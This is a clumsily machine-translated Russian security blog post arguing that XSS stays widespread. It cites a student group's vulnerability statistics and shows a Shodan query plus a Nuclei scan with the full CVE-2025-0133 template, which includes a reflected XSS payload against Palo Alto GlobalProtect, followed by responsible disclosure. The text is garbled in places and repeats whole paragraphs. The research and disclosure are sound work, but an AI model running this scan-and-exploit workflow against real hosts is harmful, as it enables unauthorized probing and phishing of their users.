Угроза XSS не уходит
14 августа 2025 г.«XSS? Все еще?»
В середине 2025 года мы все еще говорим о XSS? Да, мы все еще есть. Даже при использовании современных рамок, интеллектуальных WAF и множества статей, объясняющих, как смягчить эту угрозу, сценарии поперечного сайте (XSS) все еще присутствуют, подлый, постоянный и часто игнорируемый.
XSS является одной из первых уязвимостей, охватываемых вступительными курсами по наступательной безопасности и тестированию проникновения в веб -приложения. С помощью простой полезной нагрузки инструкторы демонстрируют, насколько тривиальный этот недостаток в эксплуатации, подчеркивая опасность и простоту его эксплуатации.
XSS является одной из первых уязвимостей, охватываемых вступительными курсами по наступательной безопасности и тестированию проникновения в веб -приложения. С помощью простой полезной нагрузки инструкторы демонстрируют, насколько тривиальный этот недостаток в эксплуатации, подчеркивая опасность и простоту его эксплуатации.
Но что такое XSS в любом случае? В соответствии сOWASP, Атаки сценариев поперечного сайта-это тип инъекции, при которой вредоносные сценарии вставляются в уязвимые веб-сайты. Эти атаки происходят, когда злоумышленник использует веб -приложение для отправки вредоносного кода, обычно сценариев, выполняемых в браузере, другому пользователю. Недостатки, которые делают эти атаки возможными, довольно распространены и возникают всякий раз, когда веб -приложение включает ввод пользователя в сгенерированный вывод без выполнения соответствующей проверки или кодирования.
Также согласноOWASP, браузер жертвы не имеет механизма для отличия законных сценариев от злонамеренных. Таким образом, когда он получает и выполняет код, он доверяет, что он пришел из безопасного источника. В результате злоумышленник может получить доступ к файлам cookie, токенам сеанса и другой конфиденциальной информации, хранящейся в браузере, а также переписать содержание страницы или перенаправление пользователя на вредоносные сайты, замаскированные как законные.
Простой пример полезной нагрузки XSS для выполнения сообщения.
CVE-Hunters против XSS
АCVE-HuntersГруппа была создана в ноябре 2024 года в качестве совместной инициативы между учениками и учителем, с четкой целью: определить уязвимости (CVE) в проектах с открытым исходным кодом. Предложение состояло в том, чтобы дать студентам практический опыт поиска недостатков в реальных условиях, выходя за рамки контролируемых лабораторий или захватить проблемы флага (CTF).
С тех пор группа проанализировала широкий спектр проектов, от небольших систем сообщества до приложений, широко используемых в общественных и образовательных секторах. Попутно выделялся один шаблон: частота, с которойСценарии поперечного сайте (xss)Уязвимости были найдены.
Этот рецидив поднимает важный вопрос: разработчики перестали относиться к XSS достаточно серьезно? Несмотря на то, что он был широко задокументированным и известным недостатком в течение многих лет, он все еще часто появляется. Даже в организациях с зрелыми процессами разработки уязвимости XSS продолжают появляться из -за сложности входных и выходных потоков, использования устаревших библиотек или отсутствия контекстуализированного тестирования.
В настоящее время у группы есть135 сообщили о уязвимостиВ53 из которых уже официально зарегистрировано как CVEПолем Общего количества обнаруженных уязвимостей,104 из типа XSS, который представляет собой значительную и тревожную пропорцию.
Типы уязвимостей, найденные CVE-Hunters
62 были идентифицированы входы хранимого типа и 42 отраженного типа, что выявило относительно равномерное распределение.
Количество хранимых против отраженного XSS
Только эта статистика усиливает идею о том, что XSS все еще является реальной проблемой, часто упускаемой из виду во время разработки, и что она продолжает заслуживает внимания, как от технического сообщества, так и от разработчиков, ответственных за приложения в производстве.
Практический опыт
Теперь вы можете думать: «Хорошо,CVE-HuntersГруппа нашла много XSS в проектах с открытым исходным кодом, но кто скажет, что крупные компании также уязвимы? »
Давайте проведем быстрый эксперимент с одним из самых последних XSS, раскрытых во время написания этой статьи:CVE-2025-0133ПолемXSS, отраженные в GlobalProtect Gateway и Portal Products, функциях Pan-OS 'Palo Alto Networks, опубликованные 14 мая 2025 года.
С помощью простого запроса на Shodan мы можем проверить предполагаемый объем использования этого продукта в мире.
Shodan's Search для страниц с Global Protect
Однако это не означает, что все уязвимы. Давайте просмотрим эксперимент для этой статьи.
First, we extract some results from Shodan, a small sample of the total amount:
1
shodan search --fields hostnames 'http.title:"GlobalProtect Portal" port:443' | grep -v '^$' > globalprotect-hostnames.txt
Shodan CLI использовался для экспорта страниц с глобальной защитой
После этого мы можем использоватьNucleiЧтобы проверить эту уязвимость и автоматизировать тест:
nuclei -l globalprotect-hostnames.txt -t CVE-2025-0133.yaml
Результаты ядер для шаблона CVE-2025-0133
Шаблон, используемый для сканирования:CVE-2025-0133Полем
id: CVE-2025-0133
info:
name: PAN-OS - Reflected Cross-Site Scripting
author: xbow,DhiyaneshDK
severity: medium
description: |
A reflected cross-site scripting (XSS) vulnerability in the GlobalProtect™ gateway and portal features of Palo Alto Networks PAN-OS® software enables execution of malicious JavaScript in the context of an authenticated Captive Portal user's browser when they click on a specially crafted link.The primary risk is phishing attacks that can lead to credential theft—particularly if you enabled Clientless VPN.
reference:
- https://security.paloaltonetworks.com/CVE-2025-0133
- https://hackerone.com/reports/3096384
classification:
epss-score: 0.00102
epss-percentile: 0.29276
metadata:
verified: true
max-request: 1
shodan-query:
- http.favicon.hash:"-631559155"
- cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
fofa-query: icon_hash="-631559155"
product: pan-os
vendor: paloaltonetworks
tags: hackerone,cve,cve2025,xss,panos,global-protect
http:
- raw:
- |
GET /ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>prompt("XSS")</script>'
- 'authentication cookie'
condition: and
- type: status
status:
- 200
# digest: 490a0046304402202037be3477c0e16d7bb7cfb9874bf1cb6894a1d8035d64115db72607a539a54502203a1dac9b97514abef71fdb6a73d681f64f788f43605f2235f1fbfd26f6ddac2c:922c64590222798bb761d5b6d8e72950
Мы получили значительное количество уязвимых хостов. Затем мы попытались определить, среди этих результатов, любые хозяева, у которых был публичный VDP, чтобы мы могли уведомить их об уязвимости. Этот шаг немного сложный для вручную, поэтому мы использовали искусственный интеллект для перекрестного ссылки, домены, извлеченных изShodanс информацией, доступной в Интернете о компаниях, у которых есть программы Buck Bounty или открыть VDP.
В ходе этого исследования мы обнаружили только две области с публичными VDP - одна крупная компания частного сектора, а другая - правительственное агентство. Оба находятся в Соединенных Штатах: один с VDP, размещенным на Bugcrowd, а другой с частным VDP, доступным по электронной почте.
Мы сообщили о обеих уязвимости для компаний ответственно.
POC отраженного XSS на одной из идентифицированных целей
Ответственное раскрытие через Bugcrowd
Важно отметить, что протестированная выборка представляет собой лишь часть обнаженных систем.
Больше чисел
Если вы все еще не убеждены в количестве XSS, которые у нас есть, мы можем сделать еще один простой поиск вКонсультативная база данных GitHubгде мы получаем возвращение31,611 XSS-связанные событияПолем
Поиск XSS в консультативной базе данных GitHub
Поиск вCVE (общие уязвимости и воздействие)База данных также выявляет значительное количество зарегистрированных уязвимостей, связанных с XSS, демонстрируя его рецидив в различных системах, приложениях и контекстах за эти годы.
Xss search на митере
Кроме того, поиск, проведенный наХакеронплатформа, широко признанная вBug щедростьэкосистема, что приводит к общему2225 публичных отчетоввключает уязвимости сценария поперечного сценария. Эти данные усиливают не только распространенность XSS, но и постоянный интерес сообщества безопасности к эксплуатации и отчетности, даже в средах с высокими стандартами безопасности.
Xss search на хакероне
Что вы можете сделать с XSS, кроме оповещения (1)?
Знаменитое предупреждение (1) часто является первым примером, используемым для демонстрации недостатка XSS. Тем не менее, реальные последствия этой уязвимости выходят далеко за рамки простого окна оповещения. Ниже мы перечислим некоторые классические и известные вредоносные действия, которые могут быть предприняты злоумышленником при эксплуатации сценария поперечного сайта:
- Кража печенья, (если файл cookie не защищен с помощью флага Httponly);
- Сессия угона, предполагая личность жертвы в аутентифицированных приложениях;
- Кейпжинг, захватывая все, что использует пользователь на скомпрометированной странице;
- Злоугодные перенаправленияфальшивые страницы, с целью применения мошенничества;
- Выполнение действий от имени пользователя, например, отправка сообщений, изменение настроек или удаление данных;
- Удаленное выполнение кодаНесмотря на то, что редко и в зависимости от конкретного контекста, может быть возможно получить удаленный доступ к системе от XSS.
Эти примеры показывают, что, хотя XSS часто недооценивает уязвимость, это может иметь серьезные последствия, особенно при использовании в приложениях с конфиденциальными данными или с высоким уровнем привилегии для пострадавшего пользователя.
Заключение
XSS не мертв, возможно, его только что проигнорировали перед лицом новых, более «гламурных» угроз. Но его молчаливое присутствие продолжает предлагать эксплуатационную поверхность атаки, часто с критическим воздействием.
Несмотря на то, что часто классифицируется как уязвимостьсерединаили даженизкийтяжесть,XSS не следует недооцениватьПолемЕго влияние может быть значительным, особенно когда оно включает в себя кражу печенья, угон сессии или перенаправление на злонамеренные страницы. И что более опасно: традиционных защиты не всегда достаточно, чтобы помешать пользователю не было обманут, чтобы нажать на этот фишинговый сайт, который использует законное URL -адрес с уязвимостью XSSПолем
В конце концов, XSS часто зависит от одного щелчка, и в этом сценарииСамая слабая ссылка, как правило, сами пользователь -Полем Неважно, насколько надежна ваша структура или насколько хорошо настроен ваш WAF: если злоумышленнику удается создать убедительную злонамеренную связь, все, что нужно, - это одно невнимательное действие жертвы для атаки для материализования.
В то время как мы полагаемся на фреймворки и WAFS, злоумышленник полагается на нашу небрежность и любопытство пользователя.
Несмотря на то, что часто классифицируется как уязвимостьсерединаили даженизкийтяжесть,XSS не следует недооцениватьПолем Его влияние может быть значительным, особенно когда оно включает в себя кражу печенья, угон сессии или перенаправление на злонамеренные страницы. И что более опасно:Традиционные защиты не всегда достаточно, чтобы не позволить пользователю зарисовать, чтобы нажать на этот фишинговый сайт, который использует законное URL -адрес с уязвимостью XSS.
В конце концов, XSS часто зависит от одного щелчка, и в этом сценарииСамая слабая ссылка, как правило, сами пользователь -Полем Неважно, насколько надежна ваша структура или насколько хорошо настроен ваш WAF: если злоумышленнику удается создать убедительную злонамеренную связь, все, что нужно, - это одно невнимательное действие жертвы для атаки для материализования.
В то время как мы полагаемся на рамки и WAF, злоумышленник полагается на нашу небрежность и любопытство пользователя.
Оригинал